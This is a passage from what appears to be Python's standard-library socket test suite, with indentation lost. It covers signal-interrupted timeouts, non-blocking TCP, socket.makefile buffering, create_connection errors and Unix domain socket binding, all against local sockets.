@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: None)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises socket.error with an
# errno of EINTR when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(socket.error) as cm:
func(*args, **kwargs)
self.assertNotIsInstance(cm.exception, socket.timeout)
self.assertEqual(cm.exception.errno, errno.EINTR)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# socket.error with an errno of EINTR when interrupted by a
# signal.
with self.assertRaises(socket.error) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
self.assertNotIsInstance(cm.exception, socket.timeout)
self.assertEqual(cm.exception.errno, errno.EINTR)
# Issue #12958: The following tests have problems on Mac OS X
@support.anticipate_failure(sys.platform == "darwin")
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.anticipate_failure(sys.platform == "darwin")
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.anticipate_failure(sys.platform == "darwin")
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except socket.error:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
# Issue 15989
if _testcapi.UINT_MAX < _testcapi.ULONG_MAX:
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
def _testSetBlocking(self):
pass
if hasattr(socket, "SOCK_NONBLOCK"):
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen(1)
# actual testing
start = time.time()
try:
self.serv.accept()
except socket.error:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except socket.error:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except socket.error:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(IOError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(socket.error, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class FileObjectInterruptedTestCase(unittest.TestCase):
"""Test that the file object correctly handles EINTR internally."""
class MockSocket(object):
def __init__(self, recv_funcs=()):
# A generator that returns callables that we'll call for each
# call to recv().
self._recv_step = iter(recv_funcs)
def recv_into(self, buffer):
data = next(self._recv_step)()
assert len(buffer) >= len(data)
buffer[:len(data)] = data
return len(data)
def _decref_socketios(self):
pass
def _textiowrap_for_test(self, buffering=-1):
raw = socket.SocketIO(self, "r")
if buffering < 0:
buffering = io.DEFAULT_BUFFER_SIZE
if buffering == 0:
return raw
buffer = io.BufferedReader(raw, buffering)
text = io.TextIOWrapper(buffer, None, None)
text.mode = "rb"
return text
@staticmethod
def _raise_eintr():
raise socket.error(errno.EINTR, "interrupted")
def _textiowrap_mock_socket(self, mock, buffering=-1):
raw = socket.SocketIO(mock, "r")
if buffering < 0:
buffering = io.DEFAULT_BUFFER_SIZE
if buffering == 0:
return raw
buffer = io.BufferedReader(raw, buffering)
text = io.TextIOWrapper(buffer, None, None)
text.mode = "rb"
return text
def _test_readline(self, size=-1, buffering=-1):
mock_sock = self.MockSocket(recv_funcs=[
lambda : b"This is the first line\nAnd the sec",
self._raise_eintr,
lambda : b"ond line is here\n",
lambda : b"",
lambda : b"", # XXX(gps): io library does an extra EOF read
])
fo = mock_sock._textiowrap_for_test(buffering=buffering)
self.assertEqual(fo.readline(size), "This is the first line\n")
self.assertEqual(fo.readline(size), "And the second line is here\n")
def _test_read(self, size=-1, buffering=-1):
mock_sock = self.MockSocket(recv_funcs=[
lambda : b"This is the first line\nAnd the sec",
self._raise_eintr,
lambda : b"ond line is here\n",
lambda : b"",
lambda : b"", # XXX(gps): io library does an extra EOF read
])
expecting = (b"This is the first line\n"
b"And the second line is here\n")
fo = mock_sock._textiowrap_for_test(buffering=buffering)
if buffering == 0:
data = b''
else:
data = ''
expecting = expecting.decode('utf-8')
while len(data) != len(expecting):
part = fo.read(size)
if not part:
break
data += part
self.assertEqual(data, expecting)
def test_default(self):
self._test_readline()
self._test_readline(size=100)
self._test_read()
self._test_read(size=100)
def test_with_1k_buffer(self):
self._test_readline(buffering=1024)
self._test_readline(size=100, buffering=1024)
self._test_read(buffering=1024)
self._test_read(size=100, buffering=1024)
def _test_readline_no_buffer(self, size=-1):
mock_sock = self.MockSocket(recv_funcs=[
lambda : b"a",
lambda : b"\n",
lambda : b"B",
self._raise_eintr,
lambda : b"b",
lambda : b"",
])
fo = mock_sock._textiowrap_for_test(buffering=0)
self.assertEqual(fo.readline(size), b"a\n")
self.assertEqual(fo.readline(size), b"Bb")
def test_no_buffer(self):
self._test_readline_no_buffer()
self._test_readline_no_buffer(size=4)
self._test_read(buffering=0)
self._test_read(size=100, buffering=0)
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(socket.error, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid cloding the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(socket.error) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(socket.error) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except socket.error:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# plaform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
if not hasattr(signal, "alarm"):
return # can only test on *nix
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except socket.error:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(socket.error, Exception))
self.assertTrue(issubclass(socket.herror, socket.error))
self.assertTrue(issubclass(socket.gaierror, socket.error))
self.assertTrue(issubclass(socket.timeout, socket.error))
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen(1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(socket.error, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as a AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
